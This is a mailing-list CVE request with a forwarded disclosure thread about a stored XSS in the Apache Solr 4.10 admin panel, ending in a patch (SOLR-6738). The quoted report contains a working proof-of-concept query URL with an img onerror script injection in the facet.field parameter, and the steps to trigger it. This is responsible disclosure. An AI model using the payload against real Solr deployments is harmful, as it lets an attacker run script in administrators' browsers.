CVE Request - Apache Solr 4.10

[Puneeth Gowda <puneethis021 () gmail com>]

Hi,

Please assign a CVE for this issue :
Software : Apache Solr
Version : 4.10

Thanks
Puneeth

FYI,



---------- Forwarded message ----------
From: Puneeth Gowda <puneethis021 () gmail com>
Date: Tue, Nov 18, 2014 at 8:30 AM
Subject: Re: Security Vulnerability in Solr v4.10
To: Stefan Matheis <steffkes () apache org>


Hello Stefan,

Patch is working fine..
Issue has been fixed now.

Thanks
Puneeth



On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes () apache org> wrote:

>  Hi Puneeth
>
> I'm really sorry about the late reply - this is my first CVE i'm handling,
> so i'm trying to do it properly and wanted to ensure that everything is
> working according to plans & ASF agenda.
>
> The CVE you've asked about is CSV-2014-3628, the fix i was working on
> already is committed to trunk, you can have a look at the applied changes
> at https://issues.apache.org/jira/browse/SOLR-6738 . I'd be happy to know
> if that covers all the cases you've discovered or if there are more that
> i've missed with this fix!
>
> -Stefan
>
> On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote:
>
> Hi Stefan,
>
> Thank you for your response.
>
> I'd really appreciate if you could assign a CVE to this bug. !
>
> Thanks
> puneeth
>
> On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes () apache org>
> wrote:
>
>  Hi Puneeth
>
> Sorry for the late response, thanks for reporting this vulnerability - i'm
> hereby acknowledging it on behalf of the Lucene PMC.
>
> We have investigated your report and accept it. I'm already working on a
> fix.
>
> -Stefan
>
> -------- Original Message --------
> Subject: Security Vulnerability in Solr v4.10
> Date: Wed, 29 Oct 2014 16:57:06 +0530
> From: Puneeth Gowda <puneethis021 () gmail com>
> To: security () apache org
>
>
>
> Hi,
>
> I would like to report a stored xss vulnerability in solr web app
> version : 4.10
>
> ###################################################
> Vulnerability Name : Stored XSS
> Software : Apache Solr
> Version : 4.10
> ###################################################
>
> POC:
>
>
> Steps:
> 1)Search with following query :
> fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a
>
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&
> json.nl
> <http://json.nl
> > =map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> Final URL :
> http://localhost:8080/solr/
> <app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img
> src=a
>
> onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20&
> json.nl
> <http://json.nl
> > =map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json
>
> 2) Now browse to Solr Admin panel
> URL: http://localhost:8080/solr/
> Click on Plugins/stats after selecting <core> from the drop down.
> Browser displays popup.
>
> Reason : The parameter "fieldvalucache" stores all searched queries
> without sanitizing, which results in execution of javascript.
>
>
> Thanks
> Puneeth